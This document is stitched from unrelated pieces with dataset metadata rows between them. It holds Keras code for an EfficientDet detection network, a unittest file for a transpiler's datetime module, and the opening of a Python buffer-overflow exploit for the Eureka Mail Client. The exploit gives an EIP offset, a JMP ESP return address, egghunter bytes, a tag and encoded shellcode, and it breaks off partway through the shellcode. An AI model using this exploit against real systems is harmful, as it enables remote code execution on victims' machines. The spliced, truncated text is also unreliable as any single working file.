name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
# P5_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in_2, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
else:
P3_in, P4_in, P5_in, P6_in, P7_in = features
P7_U = layers.UpSampling2D()(P7_in)
P6_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = wBiFPNAdd(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
return P3_out, P4_td, P5_td, P6_td, P7_out
def build_BiFPN(features, num_channels, id, freeze_bn=False):
if id == 0:
_, _, C3, C4, C5 = features
P3_in = C3
P4_in = C4
P5_in = C5
P6_in = layers.Conv2D(num_channels, kernel_size=1, padding='same', name='resample_p6/conv2d')(C5)
P6_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name='resample_p6/bn')(P6_in)
# P6_in = BatchNormalization(freeze=freeze_bn, name='resample_p6/bn')(P6_in)
P6_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p6/maxpool')(P6_in)
P7_in = layers.MaxPooling2D(pool_size=3, strides=2, padding='same', name='resample_p7/maxpool')(P6_in)
P7_U = layers.UpSampling2D()(P7_in)
P6_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P5_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/conv2d')(P5_in)
P5_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
# P5_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode1/resample_0_2_6/bn')(P5_in_1)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in_1, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P4_in_1 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/conv2d')(P4_in)
P4_in_1 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
# P4_in_1 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode2/resample_0_1_7/bn')(P4_in_1)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in_1, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P3_in = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/conv2d')(P3_in)
P3_in = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
# P3_in = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode3/resample_0_0_8/bn')(P3_in)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P4_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/conv2d')(P4_in)
P4_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
# P4_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in_2, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P5_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/conv2d')(P5_in)
P5_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
# P5_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in_2, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
else:
P3_in, P4_in, P5_in, P6_in, P7_in = features
P7_U = layers.UpSampling2D()(P7_in)
P6_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
return P3_out, P4_td, P5_td, P6_td, P7_out
class BoxNet(models.Model):
def __init__(self, width, depth, num_anchors=9, separable_conv=True, freeze_bn=False, **kwargs):
super(BoxNet, self).__init__(**kwargs)
self.width = width
self.depth = depth
self.num_anchors = num_anchors
self.separable_conv = separable_conv
options = {
'kernel_size': 3,
'strides': 1,
'padding': 'same',
'bias_initializer': 'zeros',
}
if separable_conv:
kernel_initializer = {
'depthwise_initializer': initializers.VarianceScaling(),
'pointwise_initializer': initializers.VarianceScaling(),
}
options.update(kernel_initializer)
self.convs = [layers.SeparableConv2D(filters=width, name=f'{self.name}/box-{i}', **options) for i in
range(depth)]
self.head = layers.SeparableConv2D(filters=num_anchors * 4, name=f'{self.name}/box-predict', **options)
else:
kernel_initializer = {
'kernel_initializer': initializers.RandomNormal(mean=0.0, stddev=0.01, seed=None)
}
options.update(kernel_initializer)
self.convs = [layers.Conv2D(filters=width, name=f'{self.name}/box-{i}', **options) for i in range(depth)]
self.head = layers.Conv2D(filters=num_anchors * 4, name=f'{self.name}/box-predict', **options)
self.bns = [
[layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{self.name}/box-{i}-bn-{j}') for j in
range(3, 8)]
for i in range(depth)]
# self.bns = [[BatchNormalization(freeze=freeze_bn, name=f'{self.name}/box-{i}-bn-{j}') for j in range(3, 8)]
# for i in range(depth)]
self.relu = layers.Lambda(lambda x: tf.nn.swish(x))
self.reshape = layers.Reshape((-1, 4))
self.level = 0
def call(self, inputs, **kwargs):
feature, level = inputs
for i in range(self.depth):
feature = self.convs[i](feature)
feature = self.bns[i][self.level](feature)
feature = self.relu(feature)
outputs = self.head(feature)
outputs = self.reshape(outputs)
self.level += 1
return outputs
class ClassNet(models.Model):
def __init__(self, width, depth, num_classes=20, num_anchors=9, separable_conv=True, freeze_bn=False, **kwargs):
super(ClassNet, self).__init__(**kwargs)
self.width = width
self.depth = depth
self.num_classes = num_classes
self.num_anchors = num_anchors
self.separable_conv = separable_conv
options = {
'kernel_size': 3,
'strides': 1,
'padding': 'same',
}
if self.separable_conv:
kernel_initializer = {
'depthwise_initializer': initializers.VarianceScaling(),
'pointwise_initializer': initializers.VarianceScaling(),
}
options.update(kernel_initializer)
self.convs = [layers.SeparableConv2D(filters=width, bias_initializer='zeros', name=f'{self.name}/class-{i}',
**options)
for i in range(depth)]
self.head = layers.SeparableConv2D(filters=num_classes * num_anchors,
bias_initializer=PriorProbability(probability=0.01),
name=f'{self.name}/class-predict', **options)
else:
kernel_initializer = {
'kernel_initializer': initializers.RandomNormal(mean=0.0, stddev=0.01, seed=None)
}
options.update(kernel_initializer)
self.convs = [layers.Conv2D(filters=width, bias_initializer='zeros', name=f'{self.name}/class-{i}',
**options)
for i in range(depth)]
self.head = layers.Conv2D(filters=num_classes * num_anchors,
bias_initializer=PriorProbability(probability=0.01),
name='class-predict', **options)
self.bns = [
[layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{self.name}/class-{i}-bn-{j}') for j
in range(3, 8)]
for i in range(depth)]
# self.bns = [[BatchNormalization(freeze=freeze_bn, name=f'{self.name}/class-{i}-bn-{j}') for j in range(3, 8)]
# for i in range(depth)]
self.relu = layers.Lambda(lambda x: tf.nn.swish(x))
self.reshape = layers.Reshape((-1, num_classes))
self.activation = layers.Activation('sigmoid')
self.level = 0
def call(self, inputs, **kwargs):
feature, level = inputs
for i in range(self.depth):
feature = self.convs[i](feature)
feature = self.bns[i][self.level](feature)
feature = self.relu(feature)
outputs = self.head(feature)
outputs = self.reshape(outputs)
outputs = self.activation(outputs)
self.level += 1
return outputs
def efficientdet(phi, num_classes=20, num_anchors=9, weighted_bifpn=False, freeze_bn=False,
score_threshold=0.01, detect_quadrangle=False, anchor_parameters=None, separable_conv=True):
assert phi in range(7)
input_size = image_sizes[phi]
input_shape = (input_size, input_size, 3)
image_input = layers.Input(input_shape)
w_bifpn = w_bifpns[phi]
d_bifpn = d_bifpns[phi]
w_head = w_bifpn
d_head = d_heads[phi]
backbone_cls = backbones[phi]
features = backbone_cls(input_tensor=image_input, freeze_bn=freeze_bn)
if weighted_bifpn:
fpn_features = features
for i in range(d_bifpn):
fpn_features = build_wBiFPN(fpn_features, w_bifpn, i, freeze_bn=freeze_bn)
else:
fpn_features = features
for i in range(d_bifpn):
fpn_features = build_BiFPN(fpn_features, w_bifpn, i, freeze_bn=freeze_bn)
box_net = BoxNet(w_head, d_head, num_anchors=num_anchors, separable_conv=separable_conv, freeze_bn=freeze_bn,
name='box_net')
class_net = ClassNet(w_head, d_head, num_classes=num_classes, num_anchors=num_anchors,
separable_conv=separable_conv, freeze_bn=freeze_bn, name='class_net')
classification = [class_net([feature, i]) for i, feature in enumerate(fpn_features)]
classification = layers.Concatenate(axis=1, name='classification')(classification)
regression = [box_net([feature, i]) for i, feature in enumerate(fpn_features)]
regression = layers.Concatenate(axis=1, name='regression')(regression)
model = models.Model(inputs=[image_input], outputs=[classification, regression], name='efficientdet')
# apply predicted regression to anchors
anchors = anchors_for_shape((input_size, input_size), anchor_params=anchor_parameters)
anchors_input = np.expand_dims(anchors, axis=0)
boxes = RegressBoxes(name='boxes')([anchors_input, regression[..., :4]])
boxes = ClipBoxes(name='clipped_boxes')([image_input, boxes])
# filter detections (apply NMS / score threshold / select top-k)
if detect_quadrangle:
detections = FilterDetections(
name='filtered_detections',
score_threshold=score_threshold,
detect_quadrangle=True
)([boxes, classification, regression[..., 4:8], regression[..., 8]])
else:
detections = FilterDetections(
name='filtered_detections',
score_threshold=score_threshold
)([boxes, classification])
prediction_model = models.Model(inputs=[image_input], outputs=detections, name='efficientdet_p')
return model, prediction_model
| 62.897436 | 120 | 0.640406 | 4,143 | 29,436 | 4.271301 | 0.055033 | 0.030515 | 0.042495 | 0.069055 | 0.890314 | 0.869462 | 0.858782 | 0.85347 | 0.842846 | 0.829849 | 0 | 0.048517 | 0.230466 | 29,436 | 467 | 121 | 63.03212 | 0.732695 | 0.071477 | 0 | 0.704715 | 0 | 0 | 0.152919 | 0.13021 | 0 | 0 | 0 | 0 | 0.002481 | 1 | 0.022333 | false | 0 | 0.027295 | 0 | 0.07196 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a430353fe40e38f9545035e151af37bc4b0d584 | 7,613 | py | Python | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | null | null | null | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | 1 | 2019-09-24T08:06:49.000Z | 2019-09-24T08:06:49.000Z | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | null | null | null | from unittest import expectedFailure
from ..utils import TranspileTestCase
# class DateTimeModuleTests(TranspileTestCase):
# class TimeDeltaTests(TranspileTestCase):
# class DateTimeTests(TranspileTestCase):
# def test_creation(self):
# self.assertCodeExecution("""
# from datetime import datetime
# print(datetime(1993,5,17).min)
# print(datetime(1993,5,17).max)
# print (datetime(1993,5,17).year)
# print (datetime(1993,5,17).month)
# print (datetime(1993,5,17,20,30,12,34).hour)
# print (datetime(1993,5,17,20,30,12,34).minute)
# print (datetime(1993,5,17,20,30,12,34).second)
# print (datetime(1993,5,17,20,30,12,34).microsecond)
# """)
class DateTests(TranspileTestCase):
#######################################################
# __file__
#__repr__
#@expectedFailure
#def test___repr__(self):
# self.assertCodeExecution("""
# from datetime import date
# print(date.__repr__)
#######################################################
def test_creation(self):
self.assertCodeExecution("""
from datetime import date
print(date(14, 10, day=11))
print(date(14, 10, 11))
print(date(14, month=10, day=11))
print(date(year=14, month=10, day=11))
print(date(1,1,1))
""")
def test_year_too_large(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14444, 10, 11)
except ValueError as err:
print(err)
""")
def test_month_too_large(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 122, 11)
except ValueError as err:
print(err)
""")
def test_day_too_large(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12, 111)
except ValueError as err:
print(err)
""")
def test_year_wrong_type(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14.0, 12, 11)
except TypeError as err:
print(err)
""")
def test_month_wrong_type(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12.0, 11)
except TypeError as err:
print(err)
""")
def test_day_wrong_type(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12, 11.0)
except TypeError as err:
print(err)
""")
def test_two_many_args(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12, 10,1)
except TypeError as err:
print(err)
""")
def test_two_few_args(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12)
except TypeError as err:
print(err)
""")
def test_two_few_args2(self):
self.assertCodeExecution("""
from datetime import date
try:
date(month=14, day=12)
except TypeError as err:
print(err)
""")
def test_two_few_args3(self):
self.assertCodeExecution("""
from datetime import date
try:
date(year=14, day=12)
except TypeError as err:
print(err)
""")
def test_one_arg_no_month(self):
self.assertCodeExecution("""
from datetime import date
try:
date(year=14)
except TypeError as err:
print(err)
""")
def test_two_many_args(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12, 10, 1)
except TypeError as err:
print(err)
""")
def test_two_few_args(self):
self.assertCodeExecution("""
from datetime import date
try:
date(14, 12)
except TypeError as err:
print(err)
""")
def test_two_few_args_no_yr(self):
self.assertCodeExecution("""
from datetime import date
try:
date(month=14, day=12)
except TypeError as err:
print(err)
""")
def test_two_few_args_no_month(self):
self.assertCodeExecution("""
from datetime import date
try:
date(year=14, day=12)
except TypeError as err:
print(err)
""")
def test_one_arg_no_month(self):
self.assertCodeExecution("""
from datetime import date
try:
date(year=14)
except TypeError as err:
print(err)
""")
def test_one_arg_year_float(self):
self.assertCodeExecution("""
from datetime import date
try:
date(year=14.0)
except TypeError as err:
print(err)
""")
def test_one_arg_w_month(self):
self.assertCodeExecution("""
from datetime import date
try:
date(month=14.0)
except TypeError as err:
print(err)
""")
def test_one_arg_w_day(self):
self.assertCodeExecution("""
from datetime import date
try:
date(day=71)
except TypeError as err:
print(err)
""")
def test_no_arg(self):
self.assertCodeExecution("""
from datetime import date
try:
date()
except TypeError as err:
print(err)
""")
def test_class_methods(self):
#Test function today()
self.assertCodeExecution("""
from datetime import date
print(date.today())
""")
def test_instance_methods(self):
#Test function weekday()
self.assertCodeExecution("""
from datetime import date
for d in range(1,13):
x = date(2019,d,d)
print(x.weekday())
""")
def test_ctime(self):
#Test function ctime()
self.assertCodeExecution("""
from datetime import date
for d in range(1,13):
x = date(1993,12,1)
print(x.ctime())
""")
def test_class_attributes(self):
#Min function
self.assertCodeExecution("""
from datetime import date
x = date(2019,9,22)
print(x.min)
""")
#Max function
self.assertCodeExecution("""
from datetime import date
x = date(2019,9,22)
print(x.max)
""")
def test_one_arg_w_day(self):
self.assertCodeExecution("""
from datetime import date
try:
date(day=71)
except TypeError as err:
print(err)
""")
| 25.376667 | 65 | 0.485485 | 752 | 7,613 | 4.784574 | 0.111702 | 0.185381 | 0.217621 | 0.282101 | 0.841301 | 0.814619 | 0.814619 | 0.797387 | 0.7607 | 0.618955 | 0 | 0.053935 | 0.405753 | 7,613 | 299 | 66 | 25.461538 | 0.741379 | 0.118482 | 0 | 0.8 | 0 | 0 | 0.653735 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 1 | 0.12381 | false | 0 | 0.138095 | 0 | 0.266667 | 0.147619 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8a7cd3f44ff2ca98d43a7e03e6b47774b79e986f | 3,541 | py | Python | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Author: Michael Music
# Date: 6/24/2019
# Description: Eureka Mail Client ERR Buffer Overflow Exploit
# Exercise in egghunting
# Tested on Windows XP
# Notes:
import socket
# EIP at offset 710
# ESP at offset 714
# EDI at offset 2997
# ESP has around 200 bytes of space
# EDI has 1000+ bytes of space
# CALL EDI located at 0x7e41c891 in user32.dll
# JMP ESP located at 0x7e429353
ip = '192.168.1.100'
junk = 'A' * 710
eip = '\x53\x93\x42\x7e'
egghunter_nop_sled = '\x90' * 8
egghunter = '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8' + '\x77\x30\x30\x74' + '\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
padding = '\x90' * 1000
tag = 'w00tw00t'
shellcode = ""
shellcode += "\xdb\xdd\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x43"
shellcode += "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30"
shellcode += "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30"
shellcode += "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += "\x49\x4b\x4c\x4d\x38\x4d\x52\x35\x50\x55\x50\x35\x50"
shellcode += "\x55\x30\x4c\x49\x4b\x55\x36\x51\x49\x50\x45\x34\x4c"
shellcode += "\x4b\x30\x50\x56\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b"
shellcode += "\x30\x52\x55\x44\x4c\x4b\x33\x42\x36\x48\x44\x4f\x48"
shellcode += "\x37\x31\x5a\x51\x36\x30\x31\x4b\x4f\x4e\x4c\x37\x4c"
shellcode += "\x35\x31\x53\x4c\x45\x52\x46\x4c\x51\x30\x4f\x31\x58"
shellcode += "\x4f\x54\x4d\x53\x31\x4f\x37\x4d\x32\x4b\x42\x46\x32"
shellcode += "\x50\x57\x4c\x4b\x50\x52\x54\x50\x4c\x4b\x31\x5a\x57"
shellcode += "\x4c\x4c\x4b\x50\x4c\x34\x51\x42\x58\x4d\x33\x51\x58"
shellcode += "\x45\x51\x38\x51\x50\x51\x4c\x4b\x56\x39\x57\x50\x33"
shellcode += "\x31\x59\x43\x4c\x4b\x47\x39\x54\x58\x4b\x53\x57\x4a"
shellcode += "\x51\x59\x4c\x4b\x30\x34\x4c\x4b\x45\x51\x59\x46\x46"
shellcode += "\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f\x44\x4d\x53\x31"
shellcode += "\x48\x47\x46\x58\x4d\x30\x53\x45\x4c\x36\x35\x53\x33"
shellcode += "\x4d\x4b\x48\x47\x4b\x43\x4d\x37\x54\x53\x45\x4d\x34"
shellcode += "\x50\x58\x4c\x4b\x36\x38\x51\x34\x43\x31\x48\x53\x45"
shellcode += "\x36\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x30\x58\x55\x4c"
